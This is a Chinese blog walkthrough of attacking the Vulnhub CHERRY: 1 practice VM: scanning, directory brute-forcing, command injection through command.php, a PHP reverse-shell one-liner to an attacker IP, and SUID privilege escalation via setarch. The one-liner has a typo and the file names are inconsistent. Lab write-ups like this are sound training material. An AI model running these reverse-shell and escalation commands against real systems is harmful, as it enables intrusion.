Vulnhub靶机

已于 2024-03-13 10:48:42 修改
阅读量642 收藏 2
点赞数
文章标签: 安全
于 2020-09-21 22:51:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43902100/article/details/108721085
版权

Vulnhub靶机渗透测试实战(一):CHERRY: 1

下载地址:http://www.vulnhub.com/entry/cherry-1,552/
实验环境:VMware,kali虚拟机
将下载好的镜像文件导入VMware
在这里插入图片描述
局域网内扫描主机

arp-scan -l

在这里插入图片描述
一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130
nmap扫描主机,查看开启了那些端口

nmap -sV -p- 192.168.46.130

在这里插入图片描述
发现开放了80,7755两个端口,进行访问,发现两个页面相同,未发现异常
在这里插入图片描述
尝试爆破目录

dirb http://192.168.46.130

在这里插入图片描述

dirb http://192.168.46.130:7755

在这里插入图片描述
分别访问backup目录
在这里插入图片描述

在这里插入图片描述
访问command.php发现源码,可以看到这里进行了一个GET传参
在这里插入图片描述
可以执行简单的cmd命令,权限不够不能执行反弹shell
在这里插入图片描述
在kali中写脚本

php -r '$sock-fsockopen("192.168.46.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

在这里插入图片描述

开启http服务

python -m SimpleHTTPServer port(任意指定一个端口)

在这里插入图片描述
用wget 将shell文件下载到/tmp下(特别注意:一定要开启http服务,否则上传进去的文件没有内容)
在这里插入图片描述
ls -al /tmp 查看文件权限,可以看到文件不具备执行权限
在这里插入图片描述
修改文件权限

chmod 777 /tmp/test.php

在这里插入图片描述
再次查看具有执行权限
在这里插入图片描述
使用kali监听1234端口,并且执行test.sh

nc -lvp 1234

在这里插入图片描述
反弹shell

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
提升权限

setarch $(arch) /bin/sh -p

在这里插入图片描述
得到root权限

参考:blog.csdn.net/qq_45826388/article/details/108651679

g1unt
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4078
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1445
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机-PumpkinFestival
ergeLXT的博客
06-28 613
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
vulnhub靶机DC1
weixin_52450702的博客
10-29 934
靶机DC1IP:192.168.70.160。
vulnhub靶机corrosion1
weixin_52450702的博客
11-18 675
vulnhub靶机corrosion1
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 9122
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV
LainWith的博客
06-18 1224
系列:BoredHackerBlog(此系列共4台) 发布日期:2020年03月29日 难度:初级-中级 靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 内容简介: 这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtech
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1040
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1013
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
vulnhub靶机raven2
weixin_52450702的博客
11-12 452
vulnhub靶机raven
vulnhub 靶机 Earth
qq_44029310的博客
06-12 1236
一次打靶记录。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 420
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 493
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
2024安全大模型技术与市场研究报告
最新发布
cybtec的博客
07-25 440
2024安全大模型技术与市场研究报告
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值